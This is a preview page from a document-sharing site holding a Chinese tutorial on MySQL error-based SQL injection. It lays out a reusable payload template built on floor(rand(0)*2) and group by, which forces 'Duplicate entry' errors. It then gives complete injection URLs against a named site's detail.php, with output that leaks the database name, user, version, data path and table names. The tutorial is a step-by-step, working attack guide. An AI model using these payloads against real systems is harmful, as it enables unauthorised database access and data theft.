mysql错误回显套公式法注入

mysql错误回显套公式法注入

ID:10899511

大小:28.50 KB

页数:6页

时间:2018-07-08

mysql错误回显套公式法注入_第1页
mysql错误回显套公式法注入_第2页
mysql错误回显套公式法注入_第3页
mysql错误回显套公式法注入_第4页
mysql错误回显套公式法注入_第5页
资源描述:

《mysql错误回显套公式法注入》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、MySQL错误回显套公式法注入1.公式原理mySQL报错回显爆数据,其实主要就是套公式,公式分为4部分1,逻辑错误部分,也就是将GET变量取值变为逻辑错误值,例如.php?id=0或者.php?id=12+and+1=22,固定SQL联合查询语句,语句为:(核心)unionselect1from(select+count(*),concat(floor(rand(0)*2),(注入爆数据语句))afrominformation_schema.tablesgroupbya)b3,注释语句,将整个语句后面的部分注释掉,可以用"/*"注释符,也可

2、以用"--"终止符,也可以用%23这个"#"字符4,注入爆数据语句,基本格式就是selectXXfromYY的格式。------------------------------------------------------------------------------------------------------------------注意了!!!这4个固定公式唯一要注意的是最后一个,最后一个每次只能爆单条数据,不能updata不能insertinto不能load_file()不能group_concat(),有的concat()也不

3、能用=======》嚓这样爆数据的话,就要加一个limitx,y的限制条件也就是selectXXfromYYlimita,ba是从第几条开始,从0开始为以一条,b为目标一共几条数据,这里固定为1,也就是说limit0,1是第1条数据,limit1,1是第2条数据,一次类推。----------------------------------------------------------------------------------------------------------------2.具体的实践~~~上面的逻辑你搞不清楚不要紧,

4、你可以先看注入语句再回头研究每个语句的含义MySQL显示当前数据库名,登陆用户,数据库版本和数据路径的语句是:selectconcat(0x3a,database(),0x3a,user(),0x3a,version(),0x3a,@@datadir)将上面的SQL语句作为语句4带入供述就得到注入语句:http://zone-h.com.cn/detail.php?ID=0+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(0x3a,dat

5、abase(),0x3a,user(),0x3a,version(),0x3a,@@datadir)))a+from+information_schema.tables+group+by+a)b============》符合了前面的注意我们访问一下就得到了:SQL语句错误:Duplicateentry'1:mc110_mc110:mc110@localhost:5.1.34:/usr/local/mysql/var/'forkey'group_key'Duplicateentry后面的引号中的就是数据,固定去掉数字“1”mc110_mc11

6、0是数据库名mc110@localhost是数据库用户5.1.34是版本/usr/local/mysql/var/这里是MySQL的数据路径然后我们继续看MySQL显示当前所有数据库的表??语句为:selecttable_namefrominformation_schema.tableswheretable_schema=database()limit0,1或者selecttable_namefrominformation_schema.columnswheretable_schema=database()limit0,1将这句SQL语句作

7、为上面公式中的4,就得到注入语句:http://zone-h.com.cn/detail.php?ID=0+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1))a+from+information_schema.tables+group+by+a)b复制代码访问得到:SQL语句错误:Dupli

8、cateentry'15epe_admin'forkey'group_key'其中5epe_admin就是数据表(注意,去掉固定数字:1)根据上面语句,分别将limit0,1改为

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。